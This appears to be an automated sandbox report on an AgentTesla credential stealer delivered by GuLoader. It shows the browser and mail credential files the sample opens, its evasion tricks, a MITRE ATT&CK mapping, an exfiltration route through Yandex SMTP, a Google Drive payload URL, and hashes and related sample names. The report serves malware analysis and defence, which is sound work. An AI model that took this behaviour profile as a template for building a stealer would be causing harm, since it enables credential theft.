            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: Yara matchFile source: 00000013.00000002.5684637032.000000001DE51000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 4712, type: MEMORYSTR

            Remote Access Functionality:

            barindex
            Yara detected AgentTeslaShow sources
            Source: Yara matchFile source: 00000013.00000002.5684637032.000000001DE51000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 4712, type: MEMORYSTR

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsWindows Management Instrumentation211DLL Side-Loading1DLL Side-Loading1Disable or Modify Tools1OS Credential Dumping2File and Directory Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsProcess Injection112Deobfuscate/Decode Files or Information1Input Capture21System Information Discovery115Remote Desktop ProtocolData from Local System2Exfiltration Over BluetoothEncrypted Channel21Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or Information3Credentials in Registry1Query Registry1SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Software Packing1NTDSSecurity Software Discovery421Distributed Component Object ModelInput Capture21Scheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDLL Side-Loading1LSA SecretsProcess Discovery2SSHClipboard Data1Data Transfer Size LimitsApplication Layer Protocol123Manipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonVirtualization/Sandbox Evasion351Cached Domain CredentialsVirtualization/Sandbox Evasion351VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsProcess Injection112DCSyncApplication Window Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 539603 Sample: G47wmLn8uy.exe Startdate: 14/12/2021 Architecture: WINDOWS Score: 100 21 smtp.yandex.ru 2->21 23 smtp.yandex.com 2->23 25 3 other IPs or domains 2->25 33 Found malware configuration 2->33 35 Multi AV Scanner detection for submitted file 2->35 37 GuLoader behavior detected 2->37 39 5 other signatures 2->39 8 G47wmLn8uy.exe 1 1 2->8         started        signatures3 process4 signatures5 41 Writes to foreign memory regions 8->41 43 Tries to detect Any.run 8->43 45 Hides threads from debuggers 8->45 11 CasPol.exe 11 8->11         started        15 CasPol.exe 8->15         started        17 CasPol.exe 8->17         started        process6 dnsIp7 27 smtp.yandex.ru 77.88.21.158, 49770, 587 YANDEXRU Russian Federation 11->27 29 drive.google.com 142.250.181.238, 443, 49760 GOOGLEUS United States 11->29 31 googlehosted.l.googleusercontent.com 142.250.185.65, 443, 49761 GOOGLEUS United States 11->31 47 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 11->47 49 Tries to steal Mail credentials (via file / registry access) 11->49 51 Tries to harvest and steal ftp login credentials 11->51 59 4 other signatures 11->59 19 conhost.exe 11->19         started        53 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 15->53 55 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 15->55 57 Contains functionality to register a low level keyboard hook 15->57 signatures8 process9

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            G47wmLn8uy.exe27%VirustotalBrowse
            G47wmLn8uy.exe16%ReversingLabs

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
            http://DynDns.comDynDNS0%Avira URL Cloudsafe
            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%VirustotalBrowse
            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%Avira URL Cloudsafe
            https://api.ipify.org%40%Avira URL Cloudsafe
            http://oQCcllY8wcJ5yZF5.orgt-0%Avira URL Cloudsafe
            http://oQCcllY8wcJ5yZF5.org0%Avira URL Cloudsafe
            http://yandex.ocsp-responder.com030%Avira URL Cloudsafe
            http://subca.ocsp-certum.com0.0%Avira URL Cloudsafe
            http://uYFyNj.com0%Avira URL Cloudsafe
            http://subca.ocsp-certum.com010%Avira URL Cloudsafe
            https://api.ipify.org%GETMozilla/5.00%Avira URL Cloudsafe
            https://csp.withgoogle.com/csp/report-to/gse_l9ocaq0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            smtp.yandex.ru
            		77.88.21.158
            		truefalse
              		high
              drive.google.com
              		142.250.181.238
              		truefalse
                		high
                googlehosted.l.googleusercontent.com
                		142.250.185.65
                		truefalse
                  		high
                  doc-08-0o-docs.googleusercontent.com
                  		unknown
                  		unknownfalse
                    		high
                    smtp.yandex.com
                    		unknown
                    		unknownfalse
                      		high

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      https://doc-08-0o-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/g955ofpf5ri5rpdjdcedlr3l5sifs0gg/1639494750000/08820895400503972853/*/1rvzmbX5uh5tlf4YLxhmc756C1SkQ0vOB?e=downloadfalse
                        		high

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://127.0.0.1:HTTP/1.1CasPol.exe, 00000013.00000002.5684637032.000000001DE51000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		low
                        http://DynDns.comDynDNSCasPol.exe, 00000013.00000002.5684637032.000000001DE51000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://repository.certum.pl/ctnca.cer09CasPol.exe, 00000013.00000002.5665528385.00000000011DB000.00000004.00000020.sdmp, CasPol.exe, 00000013.00000002.5687458288.000000001DF78000.00000004.00000001.sdmp, CasPol.exe, 00000013.00000002.5693982737.00000000200AA000.00000004.00000001.sdmpfalse
                          		high
                          https://doc-08-0o-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/g955ofpfCasPol.exe, 00000013.00000002.5669045312.000000000125C000.00000004.00000020.sdmpfalse
                            		high
                            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%haCasPol.exe, 00000013.00000002.5684637032.000000001DE51000.00000004.00000001.sdmpfalse
                            • 0%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            		unknown
                            http://crl.certum.pl/ctnca.crl0kCasPol.exe, 00000013.00000002.5665528385.00000000011DB000.00000004.00000020.sdmp, CasPol.exe, 00000013.00000002.5687458288.000000001DF78000.00000004.00000001.sdmp, CasPol.exe, 00000013.00000002.5693982737.00000000200AA000.00000004.00000001.sdmpfalse
                              		high
                              https://doc-08-0o-docs.googleusercontent.com/CasPol.exe, 00000013.00000003.1304902046.000000000125C000.00000004.00000001.sdmp, CasPol.exe, 00000013.00000002.5666942891.0000000001219000.00000004.00000020.sdmpfalse
                                		high
                                http://yandex.crl.certum.pl/ycasha2.crl0qCasPol.exe, 00000013.00000002.5666942891.0000000001219000.00000004.00000020.sdmp, CasPol.exe, 00000013.00000002.5687458288.000000001DF78000.00000004.00000001.sdmpfalse
                                  		high
                                  https://api.ipify.org%4CasPol.exe, 00000013.00000002.5684637032.000000001DE51000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		low
                                  https://doc-08-0o-docs.googleusercontent.com/%%doc-08-0o-docs.googleusercontent.comCasPol.exe, 00000013.00000003.1304818757.000000000124B000.00000004.00000001.sdmpfalse
                                    		high
                                    http://oQCcllY8wcJ5yZF5.orgt-CasPol.exe, 00000013.00000002.5686422952.000000001DF08000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		low
                                    https://support.google.com/chrome/?p=plugin_flashCasPol.exe, 00000013.00000002.5685409236.000000001DEA3000.00000004.00000001.sdmpfalse
                                      		high
                                      https://www.certum.pl/CPS0CasPol.exe, 00000013.00000002.5666942891.0000000001219000.00000004.00000020.sdmp, CasPol.exe, 00000013.00000002.5687458288.000000001DF78000.00000004.00000001.sdmpfalse
                                        		high
                                        http://oQCcllY8wcJ5yZF5.orgCasPol.exe, 00000013.00000002.5686422952.000000001DF08000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://smtp.yandex.comCasPol.exe, 00000013.00000002.5687458288.000000001DF78000.00000004.00000001.sdmpfalse
                                          		high
                                          http://yandex.ocsp-responder.com03CasPol.exe, 00000013.00000002.5666942891.0000000001219000.00000004.00000020.sdmp, CasPol.exe, 00000013.00000002.5687458288.000000001DF78000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://subca.ocsp-certum.com0.CasPol.exe, 00000013.00000002.5693666644.0000000020081000.00000004.00000001.sdmp, CasPol.exe, 00000013.00000002.5687458288.000000001DF78000.00000004.00000001.sdmp, CasPol.exe, 00000013.00000002.5693982737.00000000200AA000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://doc-08-0o-docs.googleusercontent.com/P~KCasPol.exe, 00000013.00000003.1304902046.000000000125C000.00000004.00000001.sdmpfalse
                                            		high
                                            http://repository.certum.pl/ca.cer09CasPol.exe, 00000013.00000002.5693666644.0000000020081000.00000004.00000001.sdmp, CasPol.exe, 00000013.00000002.5687458288.000000001DF78000.00000004.00000001.sdmp, CasPol.exe, 00000013.00000002.5693982737.00000000200AA000.00000004.00000001.sdmpfalse
                                              		high
                                              http://uYFyNj.comCasPol.exe, 00000013.00000002.5684637032.000000001DE51000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://crls.yandex.net/certum/ycasha2.crl0-CasPol.exe, 00000013.00000002.5666942891.0000000001219000.00000004.00000020.sdmp, CasPol.exe, 00000013.00000002.5687458288.000000001DF78000.00000004.00000001.sdmpfalse
                                                		high
                                                https://drive.google.com/CasPol.exe, 00000013.00000002.5665528385.00000000011DB000.00000004.00000020.sdmpfalse
                                                  		high
                                                  http://subca.ocsp-certum.com01CasPol.exe, 00000013.00000002.5665528385.00000000011DB000.00000004.00000020.sdmp, CasPol.exe, 00000013.00000002.5687458288.000000001DF78000.00000004.00000001.sdmp, CasPol.exe, 00000013.00000002.5693982737.00000000200AA000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://api.ipify.org%GETMozilla/5.0CasPol.exe, 00000013.00000002.5684637032.000000001DE51000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		low
                                                  http://crl.certum.pl/ca.crl0hCasPol.exe, 00000013.00000002.5693666644.0000000020081000.00000004.00000001.sdmp, CasPol.exe, 00000013.00000002.5687458288.000000001DF78000.00000004.00000001.sdmp, CasPol.exe, 00000013.00000002.5693982737.00000000200AA000.00000004.00000001.sdmpfalse
                                                    		high
                                                    http://www.certum.pl/CPS0CasPol.exe, 00000013.00000002.5693666644.0000000020081000.00000004.00000001.sdmp, CasPol.exe, 00000013.00000002.5665528385.00000000011DB000.00000004.00000020.sdmp, CasPol.exe, 00000013.00000002.5687458288.000000001DF78000.00000004.00000001.sdmp, CasPol.exe, 00000013.00000002.5693982737.00000000200AA000.00000004.00000001.sdmpfalse
                                                      		high
                                                      https://doc-08-0o-docs.googleusercontent.com/BQGCasPol.exe, 00000013.00000002.5666942891.0000000001219000.00000004.00000020.sdmpfalse
                                                        		high
                                                        http://repository.certum.pl/ycasha2.cer0CasPol.exe, 00000013.00000002.5666942891.0000000001219000.00000004.00000020.sdmp, CasPol.exe, 00000013.00000002.5687458288.000000001DF78000.00000004.00000001.sdmpfalse
                                                          		high
                                                          https://csp.withgoogle.com/csp/report-to/gse_l9ocaqCasPol.exe, 00000013.00000003.1304902046.000000000125C000.00000004.00000001.sdmp, CasPol.exe, 00000013.00000003.1304228961.0000000001261000.00000004.00000001.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown

                                                          Contacted IPs

                                                          • No. of IPs < 25%
                                                          • 25% < No. of IPs < 50%
                                                          • 50% < No. of IPs < 75%
                                                          • 75% < No. of IPs

                                                          Public

                                                          IPDomainCountryFlagASNASN NameMalicious
                                                          142.250.181.238
                                                          		drive.google.comUnited States
                                                          		15169GOOGLEUSfalse
                                                          77.88.21.158
                                                          		smtp.yandex.ruRussian Federation
                                                          		13238YANDEXRUfalse
                                                          142.250.185.65
                                                          		googlehosted.l.googleusercontent.comUnited States
                                                          		15169GOOGLEUSfalse

                                                          General Information

                                                          Joe Sandbox Version:34.0.0 Boulder Opal
                                                          Analysis ID:539603
                                                          Start date:14.12.2021
                                                          Start time:16:08:22
                                                          Joe Sandbox Product:CloudBasic
                                                          Overall analysis duration:0h 14m 55s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:full
                                                          Sample file name:G47wmLn8uy.exe
                                                          Cookbook file name:default.jbs
                                                          Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                          Run name:Suspected Instruction Hammering
                                                          Number of analysed new started processes analysed:42
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:0
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • HDC enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Detection:MAL
                                                          Classification:mal100.troj.spyw.evad.winEXE@8/2@3/3
                                                          EGA Information:
                                                          • Successful, ratio: 100%
                                                          HDC Information:Failed
                                                          HCA Information:
                                                          • Successful, ratio: 95%
                                                          • Number of executed functions: 108
                                                          • Number of non-executed functions: 14
                                                          Cookbook Comments:
                                                          • Adjust boot time
                                                          • Enable AMSI
                                                          • Found application associated with file extension: .exe
                                                          Warnings:
                                                          Show All
                                                          • Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, BdeUISrv.exe, SIHClient.exe, backgroundTaskHost.exe, MoUsoCoreWorker.exe, IntelPTTEKRecertification.exe, BackgroundTransferHost.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                          • Excluded IPs from analysis (whitelisted): 20.93.58.141, 20.82.207.122
                                                          • Excluded domains from analysis (whitelisted): wd-prod-cp-eu-north-3-fe.northeurope.cloudapp.azure.com, client.wns.windows.com, fs.microsoft.com, slscr.update.microsoft.com, wd-prod-cp-eu-north-2-fe.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, settings-win.data.microsoft.com, wdcp.microsoft.com, arc.msn.com, wd-prod-cp.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, ris.api.iris.microsoft.com, wdcpalt.microsoft.com, login.live.com, continuum.dds.microsoft.com, nexusrules.officeapps.live.com
                                                          • Not all processes where analyzed, report is missing behavior information
                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                          • Report size getting too big, too many NtReadVirtualMemory calls found.

                                                          Simulations

                                                          Behavior and APIs

                                                          TimeTypeDescription
                                                          16:11:55Task SchedulerRun new task: Intel PTT EK Recertification path: "C:\Windows\System32\DriverStore\FileRepository\iclsclient.inf_amd64_75ffca5eec865b4b\lib\IntelPTTEKRecertification.exe"
                                                          16:13:15API Interceptor2465x Sleep call for process: CasPol.exe modified

                                                          Joe Sandbox View / Context

                                                          IPs

                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                          77.88.21.158pago12_14299038859.exeGet hashmaliciousBrowse
                                                            36o4IDK04O.exeGet hashmaliciousBrowse
                                                              SecuriteInfo.com.Trojan.PackedNET.560.2941.exeGet hashmaliciousBrowse
                                                                SecuriteInfo.com.Trojan.PWS.Siggen2.13090.21256.exeGet hashmaliciousBrowse
                                                                  DHL Delivery Invoice.pdf.exeGet hashmaliciousBrowse
                                                                    X2lnO95KR6.exeGet hashmaliciousBrowse
                                                                      kutipan_langsung.09.12.2021.doc.exeGet hashmaliciousBrowse
                                                                        PO 012113.exeGet hashmaliciousBrowse
                                                                          zam#U00f3wienia n.374_12072021.exeGet hashmaliciousBrowse
                                                                            DHL Shipment Notification 1953341372.pdf.exeGet hashmaliciousBrowse
                                                                              Rechnung 3199900-331_pdf.exeGet hashmaliciousBrowse
                                                                                DHL Delivery Invoice.pdf.exeGet hashmaliciousBrowse
                                                                                  Price List Invoice siUMN4GAbr5Deb9.exeGet hashmaliciousBrowse
                                                                                    crcdr4zEeW.exeGet hashmaliciousBrowse
                                                                                      Payment Advice - United Overseas Bank Ltd(UOB).pdf.exeGet hashmaliciousBrowse
                                                                                        Shipment Notification 1753142378.exeGet hashmaliciousBrowse
                                                                                          50008248-SWIFT Copy, pdf ..exeGet hashmaliciousBrowse
                                                                                            DHL Delivery Invoice.pdf.exeGet hashmaliciousBrowse
                                                                                              wVOBjfwyjyjuPhgxOWJyCkcGYzQqMKjOYd.exeGet hashmaliciousBrowse
                                                                                                Payment Advice...pdf....exeGet hashmaliciousBrowse

                                                                                                  Domains

                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                  smtp.yandex.ru36o4IDK04O.exeGet hashmaliciousBrowse
                                                                                                  • 77.88.21.158
                                                                                                  SecuriteInfo.com.Trojan.PackedNET.560.2941.exeGet hashmaliciousBrowse
                                                                                                  • 77.88.21.158
                                                                                                  SecuriteInfo.com.Trojan.PWS.Siggen2.13090.21256.exeGet hashmaliciousBrowse
                                                                                                  • 77.88.21.158
                                                                                                  DHL Delivery Invoice.pdf.exeGet hashmaliciousBrowse
                                                                                                  • 77.88.21.158
                                                                                                  X2lnO95KR6.exeGet hashmaliciousBrowse
                                                                                                  • 77.88.21.158
                                                                                                  kutipan_langsung.09.12.2021.doc.exeGet hashmaliciousBrowse
                                                                                                  • 77.88.21.158
                                                                                                  PO 012113.exeGet hashmaliciousBrowse
                                                                                                  • 77.88.21.158
                                                                                                  zam#U00f3wienia n.374_12072021.exeGet hashmaliciousBrowse
                                                                                                  • 77.88.21.158
                                                                                                  DHL Shipment Notification 1953341372.pdf.exeGet hashmaliciousBrowse
                                                                                                  • 77.88.21.158
                                                                                                  Rechnung 3199900-331_pdf.exeGet hashmaliciousBrowse
                                                                                                  • 77.88.21.158
                                                                                                  DHL Delivery Invoice.pdf.exeGet hashmaliciousBrowse
                                                                                                  • 77.88.21.158
                                                                                                  Price List Invoice siUMN4GAbr5Deb9.exeGet hashmaliciousBrowse
                                                                                                  • 77.88.21.158
                                                                                                  crcdr4zEeW.exeGet hashmaliciousBrowse
                                                                                                  • 77.88.21.158
                                                                                                  Payment Advice - United Overseas Bank Ltd(UOB).pdf.exeGet hashmaliciousBrowse
                                                                                                  • 77.88.21.158
                                                                                                  Shipment Notification 1753142378.exeGet hashmaliciousBrowse
                                                                                                  • 77.88.21.158
                                                                                                  50008248-SWIFT Copy, pdf ..exeGet hashmaliciousBrowse
                                                                                                  • 77.88.21.158
                                                                                                  Tender notification_24.11.20.21.doc.exeGet hashmaliciousBrowse
                                                                                                  • 77.88.21.158
                                                                                                  H.T.P. HIGH TECH PRODUCTS CATALOGUE.pdf#U007e0.exeGet hashmaliciousBrowse
                                                                                                  • 77.88.21.158
                                                                                                  DHL Delivery Invoice.pdf.exeGet hashmaliciousBrowse
                                                                                                  • 77.88.21.158

                                                                                                  ASN

                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                  YANDEXRUpago12_14299038859.exeGet hashmaliciousBrowse
                                                                                                  • 77.88.21.158
                                                                                                  RT.msiGet hashmaliciousBrowse
                                                                                                  • 93.158.134.119
                                                                                                  36o4IDK04O.exeGet hashmaliciousBrowse
                                                                                                  • 77.88.21.158
                                                                                                  SecuriteInfo.com.Trojan.PackedNET.560.2941.exeGet hashmaliciousBrowse
                                                                                                  • 77.88.21.158
                                                                                                  SecuriteInfo.com.Trojan.PWS.Siggen2.13090.21256.exeGet hashmaliciousBrowse
                                                                                                  • 77.88.21.158
                                                                                                  DHL Delivery Invoice.pdf.exeGet hashmaliciousBrowse
                                                                                                  • 77.88.21.158
                                                                                                  X2lnO95KR6.exeGet hashmaliciousBrowse
                                                                                                  • 77.88.21.158
                                                                                                  aoImwYXf2a.exeGet hashmaliciousBrowse
                                                                                                  • 87.250.251.119
                                                                                                  xgtryuupC4Get hashmaliciousBrowse
                                                                                                  • 141.8.128.219
                                                                                                  kutipan_langsung.09.12.2021.doc.exeGet hashmaliciousBrowse
                                                                                                  • 77.88.21.158
                                                                                                  PO 012113.exeGet hashmaliciousBrowse
                                                                                                  • 77.88.21.158
                                                                                                  zam#U00f3wienia n.374_12072021.exeGet hashmaliciousBrowse
                                                                                                  • 77.88.21.158
                                                                                                  1Zk3QhAdHvGet hashmaliciousBrowse
                                                                                                  • 95.108.149.55
                                                                                                  IddcRyEXZ1Get hashmaliciousBrowse
                                                                                                  • 95.108.162.54
                                                                                                  DHL Shipment Notification 1953341372.pdf.exeGet hashmaliciousBrowse
                                                                                                  • 77.88.21.158
                                                                                                  Rechnung 3199900-331_pdf.exeGet hashmaliciousBrowse
                                                                                                  • 77.88.21.158
                                                                                                  DHL Delivery Invoice.pdf.exeGet hashmaliciousBrowse
                                                                                                  • 77.88.21.158
                                                                                                  Price List Invoice siUMN4GAbr5Deb9.exeGet hashmaliciousBrowse
                                                                                                  • 77.88.21.158
                                                                                                  67MPsax8fd.exeGet hashmaliciousBrowse
                                                                                                  • 87.250.251.119
                                                                                                  crcdr4zEeW.exeGet hashmaliciousBrowse
                                                                                                  • 77.88.21.158

                                                                                                  JA3 Fingerprints

                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                  37f463bf4616ecd445d4a1937da06e19oben32.dllGet hashmaliciousBrowse
                                                                                                  • 142.250.181.238
                                                                                                  • 142.250.185.65
                                                                                                  oben32.dllGet hashmaliciousBrowse
                                                                                                  • 142.250.181.238
                                                                                                  • 142.250.185.65
                                                                                                  pago12_14299038859.exeGet hashmaliciousBrowse
                                                                                                  • 142.250.181.238
                                                                                                  • 142.250.185.65
                                                                                                  REMITTANCE COPY 13484-pdf.htmlGet hashmaliciousBrowse
                                                                                                  • 142.250.181.238
                                                                                                  • 142.250.185.65
                                                                                                  PP-1296358929.xlsbGet hashmaliciousBrowse
                                                                                                  • 142.250.181.238
                                                                                                  • 142.250.185.65
                                                                                                  FACTURAS.exeGet hashmaliciousBrowse
                                                                                                  • 142.250.181.238
                                                                                                  • 142.250.185.65
                                                                                                  210629 Purchase Order 449 BURGHAUSEN (uZ 20-270)_PDF.exeGet hashmaliciousBrowse
                                                                                                  • 142.250.181.238
                                                                                                  • 142.250.185.65
                                                                                                  Invoice and documentsfdp.exeGet hashmaliciousBrowse
                                                                                                  • 142.250.181.238
                                                                                                  • 142.250.185.65
                                                                                                  FACTURA COBRADA,pdf.exeGet hashmaliciousBrowse
                                                                                                  • 142.250.181.238
                                                                                                  • 142.250.185.65
                                                                                                  Z09_46708.htmGet hashmaliciousBrowse
                                                                                                  • 142.250.181.238
                                                                                                  • 142.250.185.65
                                                                                                  FACTURAS.exeGet hashmaliciousBrowse
                                                                                                  • 142.250.181.238
                                                                                                  • 142.250.185.65
                                                                                                  Kitap.2021.2022 .xlsGet hashmaliciousBrowse
                                                                                                  • 142.250.181.238
                                                                                                  • 142.250.185.65
                                                                                                  SWIFT_ACK-89813.02.exeGet hashmaliciousBrowse
                                                                                                  • 142.250.181.238
                                                                                                  • 142.250.185.65
                                                                                                  np8fBjShg2.exeGet hashmaliciousBrowse
                                                                                                  • 142.250.181.238
                                                                                                  • 142.250.185.65
                                                                                                  4kW905r7N8.exeGet hashmaliciousBrowse
                                                                                                  • 142.250.181.238
                                                                                                  • 142.250.185.65
                                                                                                  np8fBjShg2.exeGet hashmaliciousBrowse
                                                                                                  • 142.250.181.238
                                                                                                  • 142.250.185.65
                                                                                                  ucGJxkkg2b.exeGet hashmaliciousBrowse
                                                                                                  • 142.250.181.238
                                                                                                  • 142.250.185.65
                                                                                                  n0rVANBRCz.exeGet hashmaliciousBrowse
                                                                                                  • 142.250.181.238
                                                                                                  • 142.250.185.65
                                                                                                  5mbFrXCn6a.exeGet hashmaliciousBrowse
                                                                                                  • 142.250.181.238
                                                                                                  • 142.250.185.65
                                                                                                  ucGJxkkg2b.exeGet hashmaliciousBrowse
                                                                                                  • 142.250.181.238
                                                                                                  • 142.250.185.65

                                                                                                  Dropped Files

                                                                                                  No context

                                                                                                  Created / dropped Files

                                                                                                  C:\Users\user\AppData\Local\Temp\~DF81F8B836C10D3FC0.TMP
                                                                                                  Process:C:\Users\user\Desktop\G47wmLn8uy.exe
                                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                  Category:dropped
                                                                                                  Size (bytes):16384
                                                                                                  Entropy (8bit):0.9730200708513237
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:r/hDKifA3RuOH/3+aVR4J5lBefVYyDnKoKgQBX2:rJKifAhx5853weyDKoKgQB
                                                                                                  MD5:E8C98D07896778A7A68D9895386FC8A0
                                                                                                  SHA1:734F506C412CAFA5BF6680E7C1EBBE939CE63773
                                                                                                  SHA-256:DCEDB0D3B75126360C0556DC3310ACBBB97ADAD114F518DF8C65E84C0E6BED51
                                                                                                  SHA-512:A48737384CACB83CDB77F1CD5CCD89EB50E5CB48C7F6A41E2EC91093A4B4E6A634B0CCF85C39B4DC49D6C0B4D3D2DEF69FF002FCD96D0CC9EA8AFADF47E6F14F
                                                                                                  Malicious:false
                                                                                                  Reputation:low
                                                                                                  Preview: ......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                  \Device\ConDrv
                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):30
                                                                                                  Entropy (8bit):3.964735178725505
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:IBVFBWAGRHneyy:ITqAGRHner
                                                                                                  MD5:9F754B47B351EF0FC32527B541420595
                                                                                                  SHA1:006C66220B33E98C725B73495FE97B3291CE14D9
                                                                                                  SHA-256:0219D77348D2F0510025E188D4EA84A8E73F856DEB5E0878D673079D05840591
                                                                                                  SHA-512:C6996379BCB774CE27EEEC0F173CBACC70CA02F3A773DD879E3A42DA554535A94A9C13308D14E873C71A338105804AFFF32302558111EE880BA0C41747A08532
                                                                                                  Malicious:false
                                                                                                  Reputation:moderate, very likely benign file
                                                                                                  Preview: NordVPN directory not found!..

                                                                                                  Static File Info

                                                                                                  General

                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                  Entropy (8bit):6.9046699069840765
                                                                                                  TrID:
                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.15%
                                                                                                  • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                  File name:G47wmLn8uy.exe
                                                                                                  File size:167936
                                                                                                  MD5:9a1518ed709f916360e56b5ac7d76995
                                                                                                  SHA1:7c85312d66edf5b02ebd6c25cfe9c036a3471263
                                                                                                  SHA256:2a0878c196278384aab473c92977d236680c788b4e5ae0cc1f415a075a6fa9e2
